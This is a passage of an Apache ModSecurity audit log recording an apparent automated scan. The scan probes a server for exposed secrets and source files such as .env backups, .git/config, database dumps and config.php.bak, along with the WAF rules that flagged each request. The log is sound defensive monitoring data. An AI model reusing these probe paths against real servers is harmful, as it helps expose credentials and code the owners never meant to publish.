"198.71.51.75"] [uri "/web/.env"] [unique_id "aFCsNlCTF37l_jAzt4oTSAAAAAU"] Stopwatch: 1750117430255483 4162 (- - -) Stopwatch2: 1750117430255483 4162; combined=2616, p1=512, p2=1969, p3=31, p4=36, p5=68, sr=127, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --89533e41-Z-- --7d09a277-A-- [17/Jun/2025:05:13:50.368754 +0530] aFCsNlJfblPUQiSn5r2R8gAAAAA 185.177.72.204 56472 127.0.0.1 7080 --7d09a277-B-- GET /web/.env.bak HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --7d09a277-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --7d09a277-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".env.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/web/.env.bak"] [unique_id "aFCsNlJfblPUQiSn5r2R8gAAAAA"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".env.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/web/.env.bak"] [unique_id "aFCsNlJfblPUQiSn5r2R8gAAAAA"] Stopwatch: 1750117430365571 3227 (- - -) Stopwatch2: 1750117430365571 3227; combined=1932, p1=435, p2=1379, p3=18, p4=25, p5=75, sr=117, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --7d09a277-Z-- --55164e15-A-- [17/Jun/2025:05:13:50.477564 +0530] aFCsNuTJOk1gXj_qIh4YSAAAAAQ 185.177.72.204 56484 127.0.0.1 7080 --55164e15-B-- GET /web/.env.local HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --55164e15-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --55164e15-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/web/.env.local"] [unique_id "aFCsNuTJOk1gXj_qIh4YSAAAAAQ"] Stopwatch: 1750117430474652 2955 (- - -) Stopwatch2: 1750117430474652 2955; combined=1719, p1=429, p2=1199, p3=20, p4=23, p5=48, sr=118, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --55164e15-Z-- --1ea5692d-A-- [17/Jun/2025:05:13:50.586634 +0530] aFCsNtyZ4SMykfn97vy32QAAAAs 185.177.72.204 56498 127.0.0.1 7080 --1ea5692d-B-- GET /web/.env.old HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --1ea5692d-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --1ea5692d-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".env.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/web/.env.old"] [unique_id "aFCsNtyZ4SMykfn97vy32QAAAAs"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".env.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/web/.env.old"] [unique_id "aFCsNtyZ4SMykfn97vy32QAAAAs"] Stopwatch: 1750117430583499 3177 (- - -) Stopwatch2: 1750117430583499 3177; combined=1927, p1=400, p2=1414, p3=20, p4=24, p5=68, sr=119, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --1ea5692d-Z-- --9871b240-A-- [17/Jun/2025:05:13:50.695386 +0530] aFCsNmMOUduHrxpwbslYowAAAAM 185.177.72.204 56510 127.0.0.1 7080 --9871b240-B-- GET /web/.env.save HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --9871b240-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --9871b240-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/web/.env.save"] [unique_id "aFCsNmMOUduHrxpwbslYowAAAAM"] Stopwatch: 1750117430692572 2857 (- - -) Stopwatch2: 1750117430692572 2857; combined=1642, p1=386, p2=1165, p3=18, p4=23, p5=50, sr=104, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --9871b240-Z-- --b3d4041d-A-- [17/Jun/2025:05:13:50.804513 +0530] aFCsNgJ4p5Cdblnjra54QgAAAAI 185.177.72.204 56514 127.0.0.1 7080 --b3d4041d-B-- GET /web/.env~ HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --b3d4041d-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --b3d4041d-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/web/.env~"] [unique_id "aFCsNgJ4p5Cdblnjra54QgAAAAI"] Stopwatch: 1750117430801363 3194 (- - -) Stopwatch2: 1750117430801363 3194; combined=1901, p1=421, p2=1383, p3=20, p4=24, p5=53, sr=115, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b3d4041d-Z-- --347eee5e-A-- [17/Jun/2025:05:13:50.913357 +0530] aFCsNooVQnPDyHnl9oPUAgAAAAY 185.177.72.204 56518 127.0.0.1 7080 --347eee5e-B-- GET /web/.git/ HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --347eee5e-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --347eee5e-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/web/.git/"] [unique_id "aFCsNooVQnPDyHnl9oPUAgAAAAY"] Stopwatch: 1750117430910445 2954 (- - -) Stopwatch2: 1750117430910445 2954; combined=1700, p1=419, p2=1173, p3=20, p4=42, p5=46, sr=115, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --347eee5e-Z-- --e692e76d-A-- [17/Jun/2025:05:13:51.022457 +0530] aFCsN1JfblPUQiSn5r2R8wAAAAA 185.177.72.204 56532 127.0.0.1 7080 --e692e76d-B-- GET /web/.git/HEAD HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --e692e76d-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --e692e76d-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/web/.git/HEAD"] [unique_id "aFCsN1JfblPUQiSn5r2R8wAAAAA"] Stopwatch: 1750117431019271 3230 (- - -) Stopwatch2: 1750117431019271 3230; combined=1970, p1=392, p2=1483, p3=23, p4=24, p5=48, sr=102, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e692e76d-Z-- --286d014f-A-- [17/Jun/2025:05:13:51.132669 +0530] aFCsNwrsPejRtmHkrKLg4gAAAAE 185.177.72.204 56534 127.0.0.1 7080 --286d014f-B-- GET /web/.git/config HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --286d014f-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --286d014f-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/web/.git/config"] [unique_id "aFCsNwrsPejRtmHkrKLg4gAAAAE"] Stopwatch: 1750117431128968 3763 (- - -) Stopwatch2: 1750117431128968 3763; combined=2361, p1=479, p2=1714, p3=35, p4=70, p5=63, sr=109, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --286d014f-Z-- --0b08936d-A-- [17/Jun/2025:05:13:51.241808 +0530] aFCsN9yZ4SMykfn97vy32gAAAAs 185.177.72.204 56542 127.0.0.1 7080 --0b08936d-B-- GET /web/.git/logs/HEAD HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --0b08936d-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --0b08936d-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/web/.git/logs/HEAD"] [unique_id "aFCsN9yZ4SMykfn97vy32gAAAAs"] Stopwatch: 1750117431238677 3184 (- - -) Stopwatch2: 1750117431238677 3184; combined=1921, p1=426, p2=1397, p3=23, p4=25, p5=50, sr=117, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --0b08936d-Z-- --baad671e-A-- [17/Jun/2025:05:13:51.427286 +0530] aFCsN2MOUduHrxpwbslYpAAAAAM 185.177.72.204 56544 127.0.0.1 7080 --baad671e-B-- GET /web/.gitignore HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --baad671e-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --baad671e-H-- Message: Warning. Matched phrase "/.gitignore" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.gitignore" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/web/.gitignore"] [unique_id "aFCsN2MOUduHrxpwbslYpAAAAAM"] Stopwatch: 1750117431347685 79657 (- - -) Stopwatch2: 1750117431347685 79657; combined=154902, p1=415, p2=1377, p3=21, p4=24, p5=76557, sr=110, sw=0, l=0, gc=76508 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --baad671e-Z-- --bf0e5528-A-- [17/Jun/2025:05:13:51.460102 +0530] aFCsNwJ4p5Cdblnjra54QwAAAAI 185.177.72.204 56554 127.0.0.1 7080 --bf0e5528-B-- GET /web/access.log HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --bf0e5528-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --bf0e5528-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/web/access.log"] [unique_id "aFCsNwJ4p5Cdblnjra54QwAAAAI"] Stopwatch: 1750117431456681 3466 (- - -) Stopwatch2: 1750117431456681 3466; combined=2090, p1=372, p2=1616, p3=21, p4=27, p5=54, sr=109, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --bf0e5528-Z-- --64bc370e-A-- [17/Jun/2025:05:13:51.678747 +0530] aFCsNwrsPejRtmHkrKLg4wAAAAE 185.177.72.204 56582 127.0.0.1 7080 --64bc370e-B-- GET /web/app.js.bak HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --64bc370e-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --64bc370e-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".js.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".js.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/web/app.js.bak"] [unique_id "aFCsNwrsPejRtmHkrKLg4wAAAAE"] Stopwatch: 1750117431674879 3931 (- - -) Stopwatch2: 1750117431674879 3931; combined=2499, p1=440, p2=1927, p3=26, p4=35, p5=71, sr=126, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --64bc370e-Z-- --e7d68a04-A-- [17/Jun/2025:05:13:51.788999 +0530] aFCsN5WbMc1Q3J_M-mhI_wAAAAo 185.177.72.204 56592 127.0.0.1 7080 --e7d68a04-B-- GET /web/backup.sql HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --e7d68a04-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --e7d68a04-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/web/backup.sql"] [unique_id "aFCsN5WbMc1Q3J_M-mhI_wAAAAo"] Stopwatch: 1750117431784689 4375 (- - -) Stopwatch2: 1750117431784689 4375; combined=2813, p1=469, p2=2197, p3=30, p4=37, p5=80, sr=130, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e7d68a04-Z-- --ee1d6636-A-- [17/Jun/2025:05:13:52.444832 +0530] aFCsOJWbMc1Q3J_M-mhJAAAAAAo 185.177.72.204 56640 127.0.0.1 7080 --ee1d6636-B-- GET /web/config.php.bak HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --ee1d6636-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --ee1d6636-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".php.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".php.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/web/config.php.bak"] [unique_id "aFCsOJWbMc1Q3J_M-mhJAAAAAAo"] Stopwatch: 1750117432440908 3977 (- - -) Stopwatch2: 1750117432440908 3977; combined=2489, p1=422, p2=1939, p3=27, p4=32, p5=69, sr=109, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ee1d6636-Z-- --76e70e67-A-- [17/Jun/2025:05:13:52.663121 +0530] aFCsOFCTF37l_jAzt4oTSwAAAAU 185.177.72.204 56664 127.0.0.1 7080 --76e70e67-B-- GET /web/db.sql HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --76e70e67-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --76e70e67-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/web/db.sql"] [unique_id "aFCsOFCTF37l_jAzt4oTSwAAAAU"] Stopwatch: 1750117432659939 3225 (- - -) Stopwatch2: 1750117432659939 3225; combined=1990, p1=411, p2=1481, p3=20, p4=25, p5=53, sr=121, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --76e70e67-Z-- --8c9b107e-A-- [17/Jun/2025:05:13:52.881108 +0530] aFCsOArsPejRtmHkrKLg5QAAAAE 185.177.72.204 56680 127.0.0.1 7080 --8c9b107e-B-- GET /web/debug.log HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --8c9b107e-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --8c9b107e-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/web/debug.log"] [unique_id "aFCsOArsPejRtmHkrKLg5QAAAAE"] Stopwatch: 1750117432878293 2856 (- - -) Stopwatch2: 1750117432878293 2856; combined=1709, p1=349, p2=1269, p3=18, p4=22, p5=50, sr=100, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --8c9b107e-Z-- --0c684d04-A-- [17/Jun/2025:05:13:53.108169 +0530] 